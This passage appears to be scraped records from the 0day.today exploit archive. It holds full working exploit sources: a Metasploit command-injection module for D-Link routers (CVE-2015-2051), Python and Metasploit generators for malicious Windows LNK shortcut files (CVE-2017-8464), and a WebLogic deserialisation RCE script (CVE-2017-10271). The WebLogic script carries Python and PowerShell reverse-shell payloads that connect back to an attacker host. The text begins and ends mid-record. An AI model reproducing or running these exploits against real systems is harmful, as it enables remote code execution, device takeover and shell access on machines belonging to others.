#{exploit_file}\")\r\n cmd_exec(\"chmod +x #{payload_file}\")\r\n cmd_exec(\"#{exploit_file} #{payload_file}\")\r\n end\r\n\r\n def osx_ver\r\n cmd_exec(\"sw_vers -productVersion\").to_s.strip\r\n end\r\n\r\n def ver_lt(a, b)\r\n Gem::Version.new(a) < Gem::Version.new(b)\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-11] #", "sourceHref": "https://0day.today/exploit/22959", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T09:18:51", "description": "Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This Metasploit module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR", "cvss3": {}, "published": "2015-06-02T00:00:00", "type": "zdt", "title": "D-Link Devices HNAP SOAPAction-Header Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2051"], "modified": "2015-06-02T00:00:00", "id": "1337DAY-ID-23682", "href": "https://0day.today/exploit/description/23682", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution',\r\n 'Description' => %q{\r\n Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP\r\n interface. 
Since it is a blind OS command injection vulnerability, there is no\r\n output for the executed command. This module has been tested on a DIR-645 device.\r\n The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,\r\n DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,\r\n DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR\r\n },\r\n 'Author' =>\r\n [\r\n 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645\r\n 'Craig Heffner', # independent Vulnerability discovery on different other routers\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],\r\n ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']\r\n ],\r\n 'DisclosureDate' => 'Feb 13 2015',\r\n 'Privileged' => true,\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian', # unknown if there are BE devices out there ... 
but in case we have a target\r\n {\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n end\r\n \r\n def check\r\n uri = '/HNAP1/'\r\n soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action,\r\n }\r\n })\r\n \r\n if res && [200].include?(res.code) && res.body =~ /D-Link/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n \r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n \r\n print_status(\"#{peer} - Exploiting...\")\r\n \r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 200,\r\n :temp => ''\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts)\r\n \r\n uri = '/HNAP1/'\r\n \r\n # we can not use / in our command so we need to use a little trick\r\n cmd_new = 'cd && cd tmp && export PATH=$PATH:. 
&& ' << cmd\r\n soap_action = \"http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`\"\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action,\r\n }\r\n }, 3)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/23682", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-06T01:16:08", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-08-06T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-08-06T00:00:00", "id": "1337DAY-ID-28245", "href": "https://0day.today/exploit/description/28245", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\r\n# CVE : 2017-8464\r\n# Authors : [ykoster, nixawk]\r\n# Notice : Only for educational purposes.\r\n# Support : python2\r\n \r\nimport struct\r\n \r\n \r\ndef generate_SHELL_LINK_HEADER():\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | HeaderSize |\r\n # -----------------------------------------------------------------\r\n # | LinkCLSID (16 bytes) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | ... 
|\r\n # -----------------------------------------------------------------\r\n # | LinkFlags |\r\n # -----------------------------------------------------------------\r\n # | FileAttributes |\r\n # -----------------------------------------------------------------\r\n # | CreationTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | AccessTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | WriteTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | FileSize |\r\n # -----------------------------------------------------------------\r\n # | IconIndex |\r\n # -----------------------------------------------------------------\r\n # | ShowCommand |\r\n # -----------------------------------------------------------------\r\n # | HotKey | Reserved1 |\r\n # -----------------------------------------------------------------\r\n # | Reserved2 |\r\n # -----------------------------------------------------------------\r\n # | Reserved3 |\r\n # -----------------------------------------------------------------\r\n \r\n shell_link_header = [\r\n b'\\x4c\\x00\\x00\\x00', # \"HeaderSize\" : (4 bytes)\r\n b'\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46', # \"LinkCLSID\" : (16 bytes) HKEY_CLASSES_ROOT\\CLSID\\{00021401-0000-0000-C000-000000000046}\r\n b'\\x81\\x00\\x00\\x00', # \"LinkFlags\" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode\r\n b'\\x00\\x00\\x00\\x00', # \"FileAttributes\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"CreationTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"AccessTime\" : (8 bytes)\r\n 
b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"WriteTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"FileSize\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"IconIndex\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"ShowCommand\" : (4 bytes)\r\n b'\\x00\\x00', # \"HotKey\" : (2 bytes)\r\n b'\\x00\\x00', # \"Reserved1\" : (2 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved2\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved3\" : (4 bytes)\r\n ]\r\n \r\n return b\"\".join(shell_link_header)\r\n \r\n \r\ndef generate_LINKTARGET_IDLIST(path, name):\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | IDListSize | IDList(variable) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n \r\n # IDList = ItemID + ItemID + ... 
+ TerminalID\r\n # ItemID = ItemIDSize + Data\r\n \r\n def generate_ItemID(Data):\r\n itemid = [\r\n struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data)\r\n Data\r\n ]\r\n # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data)\r\n \r\n # return ItemIDSize + Data\r\n \r\n return b\"\".join(itemid)\r\n \r\n def generate_cpl_applet(path, name=name):\r\n name += b'\\x00'\r\n path += b'\\x00'\r\n \r\n bindata = [\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x6a\\x00\\x00\\x00\\x00\\x00\\x00',\r\n struct.pack('H', len(path)),\r\n struct.pack('H', len(name)),\r\n path.encode('utf-16')[2:],\r\n name.encode('utf-16')[2:],\r\n b\"\\x00\\x00\" # comment\r\n ]\r\n \r\n return b\"\".join(bindata)\r\n \r\n idlist = [\r\n # ItemIDList\r\n \r\n generate_ItemID(b'\\x1f\\x50\\xe0\\x4f\\xd0\\x20\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(b'\\x2e\\x80\\x20\\x20\\xec\\x21\\xea\\x3a\\x69\\x10\\xa2\\xdd\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(generate_cpl_applet(path)),\r\n \r\n b'\\x00\\x00', # TerminalID\r\n ]\r\n \r\n idlist = b\"\".join(idlist)\r\n idlistsize = struct.pack('H', len(idlist))\r\n \r\n linktarget_idlist = [\r\n idlistsize,\r\n idlist,\r\n ]\r\n \r\n return b\"\".join(linktarget_idlist)\r\n \r\n \r\ndef generate_EXTRA_DATA():\r\n # ExtraData refers to a set of structures that convey additional information about a link target. 
These\r\n # optional structures can be present in an extra data section that is appended to the basic Shell Link\r\n # Binary File Format.\r\n \r\n # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK\r\n \r\n # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /\r\n # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /\r\n # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /\r\n # SHIM_PROPS / SPECIAL_FOLDER_PROPS /\r\n # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS\r\n \r\n # SpecialFolderDataBlock\r\n \r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | BlockSize |\r\n # -----------------------------------------------------------------\r\n # | BlockSignatire |\r\n # -----------------------------------------------------------------\r\n # | SpecialFolderID |\r\n # -----------------------------------------------------------------\r\n # | Offset |\r\n # -----------------------------------------------------------------\r\n \r\n extra_data = [\r\n b'\\x10\\x00\\x00\\x00',\r\n b'\\x05\\x00\\x00\\xA0',\r\n b'\\x03\\x00\\x00\\x00',\r\n b'\\x28\\x00\\x00\\x00',\r\n b'\\x00\\x00\\x00\\x00' # TERMINAL_BLOCK\r\n ]\r\n \r\n return b\"\".join(extra_data)\r\n \r\n \r\ndef ms_shllink(path, name=b\"Microsoft\"):\r\n '''build Shell Link (.LNK) Binary File Format'''\r\n \r\n lnk_format = [\r\n \r\n # Structures\r\n \r\n # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]\r\n # [STRING_DATA] *EXTRA_DATA\r\n \r\n \r\n # SHELL_LINK_HEADER:\r\n # A ShelllinkHeader structure which contains identification information, timestamps, and\r\n # flags that specify the presence of optional structures.\r\n \r\n generate_SHELL_LINK_HEADER(),\r\n \r\n # LINKTARGET_IDLIST:\r\n # An optional LinkTargetIDList structure, which specifies the target of 
the link. The\r\n # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader.\r\n #\r\n #\r\n \r\n generate_LINKTARGET_IDLIST(path, name),\r\n \r\n # LINKINFO:\r\n # An optional LinkInfo structure, which specifies information necessary to resolve the link target.\r\n # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader.\r\n \r\n # STRING_DATA:\r\n # Zero or more optional StringData structures, which are used to convey user interface and path\r\n # identification information. The presence of these structures is specified by bits in the ShellLinkHeader.\r\n \r\n # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]\r\n # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]\r\n \r\n # EXTRA_DATA:\r\n # Zero or more ExtraData structures\r\n \r\n generate_EXTRA_DATA()\r\n ]\r\n \r\n return b\"\".join(lnk_format)\r\n \r\n \r\nif __name__ == '__main__':\r\n import sys\r\n \r\n if len(sys.argv) != 3:\r\n print(\"[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\")\r\n print(\"[*] Usage: %s </path/to/test.lnk> </path/to/test.dll>\" % sys.argv[0])\r\n sys.exit(0)\r\n \r\n lnkpath = sys.argv[1]\r\n dllpath = sys.argv[2]\r\n \r\n bindata = ms_shllink(path=dllpath)\r\n \r\n with open(lnkpath, 'wb') as lnkf:\r\n lnkf.write(bindata)\r\n \r\n \r\n## References\r\n \r\n# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\r\n# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx\r\n# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf\r\n# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf\r\n# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files\r\n# 6. https://twitter.com/mkolsek/status/877499744704237568\r\n# 7. 
https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g\r\n# 8. https://github.com/rapid7/metasploit-framework/pull/8767\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/28245", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T02:08:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-26T00:00:00", "id": "1337DAY-ID-28197", "href": "https://0day.today/exploit/description/28197", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::EXE\r\n \r\n attr_accessor :exploit_dll_name\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'LNK Remote Code Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\r\n that contain a dynamic icon, loaded from a malicious DLL.\r\n \r\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\r\n similar except that an additional SpecialFolderDataBlock is included. The folder ID set\r\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\r\n the CPL whitelist. 
This bypass can be used to trick Windows into loading an arbitrary\r\n DLL file.\r\n },\r\n 'Author' =>\r\n [\r\n 'Uncredited', # vulnerability discovery\r\n 'Yorick Koster' # msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8464'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\r\n ['URL', 'http://paper.seebug.org/357/'], # writeup\r\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\r\n ],\r\n 'DefaultTarget' => 0, # Default target is 64-bit\r\n 'DisclosureDate' => 'Jun 13 2017'))\r\n \r\n register_advanced_options(\r\n [\r\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])\r\n ])\r\n end\r\n \r\n def exploit\r\n dll = generate_payload_dll\r\n dll_name = \"#{rand_text_alpha(16)}.dll\"\r\n dll_path = store_file(dll, dll_name)\r\n print_status(\"#{dll_path} created, copy it to the root folder of the target USB drive\")\r\n \r\n # HACK the vulnerability doesn't appear to work with UNC paths\r\n # Create LNK files to different drives instead\r\n 'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i|\r\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\r\n lnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\")\r\n print_status(\"#{lnk_path} created, copy to the USB drive if drive letter is #{i}\")\r\n end\r\n end\r\n \r\n def generate_link(path)\r\n path << \"\\x00\"\r\n display_name = \"Flash Player\\x00\" # LNK Display Name\r\n comment = \"\\x00\"\r\n \r\n # Control Panel Applet ItemID with our DLL\r\n cpl_applet = [\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 
0x00, 0x00, 0x00, 0x00, \r\n 0x00, 0x00\r\n ].pack('C*')\r\n cpl_applet << [path.length].pack('v')\r\n cpl_applet << [display_name.length].pack('v')\r\n cpl_applet << path.unpack('C*').pack('v*')\r\n cpl_applet << display_name.unpack('C*').pack('v*')\r\n cpl_applet << comment.unpack('C*').pack('v*')\r\n \r\n # LinkHeader\r\n ret = [\r\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\r\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\r\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\r\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\r\n 0x00, 0x00, 0x00, 0x00, # FileSize\r\n 0x00, 0x00, 0x00, 0x00, # IconIndex\r\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\r\n 0x00, 0x00, # HotKey\r\n 0x00, 0x00, # Reserved1\r\n 0x00, 0x00, 0x00, 0x00, # Reserved2\r\n 0x00, 0x00, 0x00, 0x00 # Reserved3\r\n ].pack('C*')\r\n \r\n # IDList\r\n idlist_data = ''\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # This PC\r\n 0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # All Control Panel Items\r\n 0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [cpl_applet.length + 2].pack('v')\r\n idlist_data << cpl_applet\r\n idlist_data << [0x00].pack('v') # TerminalID\r\n \r\n # LinkTargetIDList\r\n ret << [idlist_data.length].pack('v') # IDListSize\r\n ret << idlist_data\r\n \r\n # ExtraData\r\n # SpecialFolderDataBlock\r\n ret << [\r\n 0x10, 0x00, 0x00, 0x00, # BlockSize\r\n 0x05, 0x00, 0x00, 
0xA0, # BlockSignature 0xA0000005\r\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\r\n 0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\r\n ].pack('C*')\r\n # TerminalBlock\r\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\r\n ret\r\n end\r\n \r\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\r\n def store_file(data, filename)\r\n ltype = \"exploit.fileformat.#{self.shortname}\"\r\n \r\n if ! ::File.directory?(Msf::Config.local_directory)\r\n FileUtils.mkdir_p(Msf::Config.local_directory)\r\n end\r\n \r\n if filename and not filename.empty?\r\n if filename =~ /(.*)\\.(.*)/\r\n ext = $2\r\n fname = $1\r\n else\r\n fname = filename\r\n end\r\n else\r\n fname = \"local_#{Time.now.utc.to_i}\"\r\n end\r\n \r\n fname = ::File.split(fname).last\r\n \r\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\r\n fname << \".#{ext}\"\r\n \r\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\r\n full_path = ::File.expand_path(path)\r\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\r\n \r\n full_path.dup\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/28197", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# 
Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. 
E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n 
self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n 